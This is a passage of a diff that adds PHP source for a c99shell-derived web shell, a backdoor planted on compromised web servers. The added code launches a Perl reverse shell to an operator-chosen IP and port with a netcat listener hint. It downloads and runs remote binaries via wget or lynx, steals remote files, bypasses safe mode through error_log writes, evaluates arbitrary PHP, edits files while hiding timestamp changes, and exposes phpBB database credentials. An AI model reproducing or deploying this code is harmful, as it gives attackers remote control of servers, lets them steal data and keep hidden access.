+    $i++; 
+   } 
+  } 
+  // Compiling table 
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); 
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgcolor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; 
+  foreach($table as $row) 
+  { 
+   echo "<tr>\r\n"; 
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";} 
+   echo "</tr>\r\n"; 
+  } 
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"> 
+  <script> 
+  function ls_setcheckboxall(status) 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = status; 
+    id++; 
+   } 
+  } 
+  function ls_reverse_all() 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; 
+    id++; 
+   } 
+  } 
+  </script> 
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; 
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) 
+  { 
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
+  } 
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>"; 
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; 
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; 
+  if ($usefsbuff) 
+  { 
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; 
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; 
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; 
+  } 
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; 
+  echo "</form>"; 
+ } 
+} 
+if ($act == "tools") 
+{ 
+
+
+
+
+
+
+ ?> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57  </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">
+    </div>
+ <form action="<?php echo $surl; ?>">
+<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+  
+ 
+   <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+   
+   </center>
+    </td>
+</tr></TABLE>
+ 
+ 
+ 
+ 
+ 
+
+
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><b>Safe_Mode Bypass</b>
+    <form action="<?php echo $surl; ?>" method="POST">
+    <input type=hidden name=act value=tools>
+    <textarea name="erorr" cols=100 rows=10></textarea></br>
+    <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84>
+    <input type="submit" value="Write 2 File !!">
+    
+    </form>
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    </div>
+ 
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+   <form action="<?php echo $surl; ?>" method="POST">
+   <input type=hidden name=act value=tools>
+   Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500  value=""><br><br> 
+Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> 
+<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> 
+</form>
+<br><br><br>
+   
+   
+   
+   
+   </center>
+   
+   </center>
+    </td>
+</tr></TABLE>
+
+
+
+
+
+
+
+
+
+
+
+
+<?php 
+
+if (isset($_POST['dosyaa']))
+{
+dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
+
+}
+if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) 
+{ 
+ cf("/tmp/back",$back_connect); 
+ $p2=which("perl"); 
+ $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); 
+echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; 
+} 
+if (!empty($_GET['dolma'])) 
+{  
+$sayko=htmlspecialchars($_GET['dolma']); 
+if ($sayko == "wgetcan") 
+{ 
+
+myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+
+} 
+
+else if ($sayko =="freadcan") 
+{ 
+dosyayicek($adires,"sayko_bind");
+myshellexec("./sayko_bind");
+} 
+
+else if ($sayko == "lynxcan") 
+{ 
+myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+} 
+
+
+
+
+
+} 
+
+if  (!empty($_POST['erorr'])) 
+{
+
+
+
+error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
+
+
+
+}
+
+
+
+
+
+
+
+
+
+} 
+if ($act == "processes") 
+{ 
+ echo "<b>Processes:</b><br>"; 
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} 
+ else {$handler = "tasklist";} 
+ $ret = myshellexec($handler); 
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";} 
+ else 
+ { 
+  if (empty($processes_sort)) {$processes_sort = $sort_default;} 
+  $parsesort = parsesort($processes_sort); 
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} 
+  $k = $parsesort[0]; 
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  $ret = htmlspecialchars($ret); 
+  if (!$win) 
+  { 
+   if ($pid) 
+   { 
+    if (is_null($sig)) {$sig = 9;} 
+    echo "Sending signal ".$sig." to #".$pid."... "; 
+    if (posix_kill($pid,$sig)) {echo "OK.";} 
+    else {echo "ERROR.";} 
+   } 
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);} 
+   $stack = explode("\n",$ret); 
+   $head = explode(" ",$stack[0]); 
+   unset($stack[0]); 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+{ 
+ echo "<tr>"; 
+     $line = explode(" ",$line); 
+     $line[10] = join(" ",array_slice($line,10)); 
+     $line = array_slice($line,0,11); 
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} 
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; 
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  else 
+  { 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);} 
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   $stack = explode("\n",$ret); 
+   unset($stack[0],$stack[2]); 
+   $stack = array_values($stack); 
+   $head = explode("",$stack[0]); 
+   $head[1] = explode(" ",$head[1]); 
+   $head[1] = $head[1][0]; 
+   $stack = array_slice($stack,1); 
+   unset($head[2]); 
+   $head = array_values($head); 
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   if ($k > count($head)) {$k = count($head)-1;} 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+    { 
+     echo "<tr>"; 
+     $line = explode("",$line); 
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); 
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  $head[$k] = "<b>".$head[$k]."</b>".$y; 
+  $v = $processes_sort[0]; 
+  usort($prcs,"tabsort"); 
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} 
+  $tab = array(); 
+  $tab[] = $head; 
+  $tab = array_merge($tab,$prcs); 
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; 
+  foreach($tab as $i=>$k) 
+  { 
+   echo "<tr>"; 
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} 
+   echo "</tr>"; 
+  } 
+  echo "</table>"; 
+ } 
+} 
+if ($act == "eval") 
+{ 
+ if (!empty($eval)) 
+ { 
+  echo "<b>Result of execution this PHP-code</b>:<br>"; 
+  $tmp = ob_get_contents(); 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  if ($tmp) 
+  { 
+   ob_clean(); 
+   eval($eval); 
+   $ret = ob_get_contents(); 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   ob_clean(); 
+   echo $tmp; 
+   if ($eval_txt) 
+   { 
+    $rows = count(explode("\r\n",$ret))+1; 
+    if ($rows < 10) {$rows = 10;} 
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+   } 
+   else {echo $ret."<br>";} 
+  } 
+  else 
+  { 
+   if ($eval_txt) 
+   { 
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; 
+    eval($eval); 
+    echo "</textarea>"; 
+   } 
+   else {echo $ret;} 
+  } 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; 
+} 
+if ($act == "f") 
+{ 
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") 
+ { 
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} 
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} 
+ } 
+ else 
+ { 
+  $r = @file_get_contents($d.$f); 
+  $ext = explode(".",$f); 
+  $c = count($ext)-1; 
+  $ext = $ext[$c]; 
+  $ext = strtolower($ext); 
+  $rft = ""; 
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} 
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} 
+  if (empty($ft)) {$ft = $rft;} 
+  $arr = array( 
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), 
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), 
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), 
+   array("Code","code"), 
+   array("Session","phpsess"), 
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), 
+   array("SDB","sdb"), 
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), 
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), 
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), 
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), 
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") 
+  ); 
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; 
+  foreach($arr as $t) 
+  { 
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} 
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} 
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} 
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; 
+  } 
+  echo "<hr size=\"1\" noshade>"; 
+  if ($ft == "info") 
+  { 
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; 
+   if (!$win) 
+   { 
+    echo "<tr><td><b>Owner/Group</b></td><td> ";     
+    $ow = posix_getpwuid(fileowner($d.$f)); 
+    $gr = posix_getgrgid(filegroup($d.$f)); 
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); 
+   } 
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; 
+   $fi = fopen($d.$f,"rb"); 
+   if ($fi) 
+   { 
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} 
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} 
+    $n = 0; 
+    $a0 = "00000000<br>"; 
+    $a1 = ""; 
+    $a2 = ""; 
+    for ($i=0; $i<strlen($str); $i++) 
+    { 
+     $a1 .= sprintf("%02X",ord($str[$i]))." "; 
+     switch (ord($str[$i])) 
+     { 
+      case 0:  $a2 .= "<font>0</font>"; break; 
+      case 32: 
+      case 10: 
+      case 13: $a2 .= "&nbsp;"; break; 
+      default: $a2 .= htmlspecialchars($str[$i]); 
+     } 
+     $n++; 
+     if ($n == $hexdump_rows) 
+     { 
+      $n = 0; 
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} 
+      $a1 .= "<br>"; 
+      $a2 .= "<br>"; 
+     } 
+    } 
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} 
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; 
+   } 
+   $encoded = ""; 
+   if ($base64 == 1) 
+   { 
+    echo "<b>Base64 Encode</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+   } 
+   elseif($base64 == 2) 
+   { 
+    echo "<b>Base64 Encode + Chunk</b><br>"; 
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); 
+   } 
+   elseif($base64 == 3) 
+   { 
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); 
+   } 
+   elseif($base64 == 4) 
+   { 
+    $text = file_get_contents($d.$f); 
+    $encoded = base64_decode($text); 
+    echo "<b>Base64 Decode"; 
+    if (base64_encode($encoded) != $text) {echo " (failed)";} 
+    echo "</b><br>"; 
+   } 
+   if (!empty($encoded)) 
+   { 
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; 
+   } 
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> 
+<P>"; 
+  } 
+  elseif ($ft == "html") 
+  { 
+   if ($white) {@ob_clean();} 
+   echo $r; 
+   if ($white) {c99shexit();} 
+  } 
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} 
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} 
+  elseif ($ft == "phpsess") 
+  { 
+   echo "<pre>"; 
+   $v = explode("|",$r); 
+   echo $v[0]."<br>"; 
+   var_dump(unserialize($v[1])); 
+   echo "</pre>"; 
+  } 
+  elseif ($ft == "exe") 
+  { 
+   $ext = explode(".",$f); 
+   $c = count($ext)-1; 
+   $ext = $ext[$c]; 
+   $ext = strtolower($ext); 
+   $rft = ""; 
+   foreach($exeftypes as $k=>$v) 
+   { 
+    if (in_array($ext,$v)) {$rft = $k; break;} 
+   } 
+   $cmd = str_replace("%f%",$f,$rft); 
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; 
+  } 
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} 
+  elseif ($ft == "code") 
+  { 
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) 
+   { 
+    $arr = explode("\n",$r); 
+    if (count($arr == 18)) 
+    { 
+     include($d.$f); 
+     echo "<b>phpBB configuration is detected in this file!<br>"; 
+     if ($dbms == "mysql4") {$dbms = "mysql";} 
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} 
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} 
+     echo "Parameters for manual connect:<br>"; 
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); 
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} 
+     echo "</b><hr size=\"1\" noshade>"; 
+    } 
+   } 
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; 
+   if (!empty($white)) {@ob_clean();} 
+   highlight_file($d.$f); 
+   if (!empty($white)) {c99shexit();} 
+   echo "</div>"; 
+  } 
+  elseif ($ft == "download") 
+  { 
+   @ob_clean(); 
+   header("Content-type: application/octet-stream"); 
+   header("Content-length: ".filesize($d.$f)); 
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo $r; 
+   exit; 
+  } 
+  elseif ($ft == "notepad") 
+  { 
+   @ob_clean(); 
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit; 
+  } 
+  elseif ($ft == "img") 
+  { 
+   $inf = getimagesize($d.$f); 
+   if (!$white) 
+   { 
+    if (empty($imgsize)) {$imgsize = 20;} 
+    $width = $inf[0]/100*$imgsize; 
+    $height = $inf[1]/100*$imgsize; 
+    echo "<center><b>Size:</b>&nbsp;"; 
+    $sizes = array("100","50","20"); 
+    foreach ($sizes as $v) 
+    { 
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; 
+     if ($imgsize != $v ) {echo $v;} 
+     else {echo "<u>".$v."</u>";} 
+     echo "</a>&nbsp;&nbsp;&nbsp;"; 
+    } 
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; 
+   } 
+   else 
+   { 
+    @ob_clean(); 
+    $ext = explode($f,"."); 
+    $ext = $ext[count($ext)-1]; 
+    header("Content-type: ".$inf["mime"]); 
+    readfile($d.$f); 
+    exit; 
+   } 
+  } 
+  elseif ($ft == "edit") 
+  { 
+   if (!empty($submit)) 
+   { 
+    if ($filestealth) {$stat = stat($d.$f);} 
+    $fp = fopen($d.$f,"w"); 
+    if (!$fp) {echo "<b>Can't write to file!</b>";} 
+    else 
+    { 
+     echo "<b>Saved!</b>"; 
+     fwrite($fp,$edit_text); 
+     fclose($fp); 
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} 
+     $r = $edit_text; 
+    } 
+   } 
+   $rows = count(explode("\r\n",$r)); 
+   if ($rows < 10) {$rows = 10;} 
+   if ($rows > 30) {$rows = 30;} 
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; 
+  } 
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} 
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} 
+ } 
+} 
+} 
+else 
+{ 
+ @ob_clean(); 
+ $images = array( 
+"arrow_ltr"=> 
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", 
+"back"=> 
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". 
+"Wg0JADs=", 
+"buffer"=> 
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". 
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", 
+"change"=> 
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". 
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". 
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". 
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". 
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". 
+"zMshADs=", 
+"delete"=> 
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". 
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". 
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". 
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". 
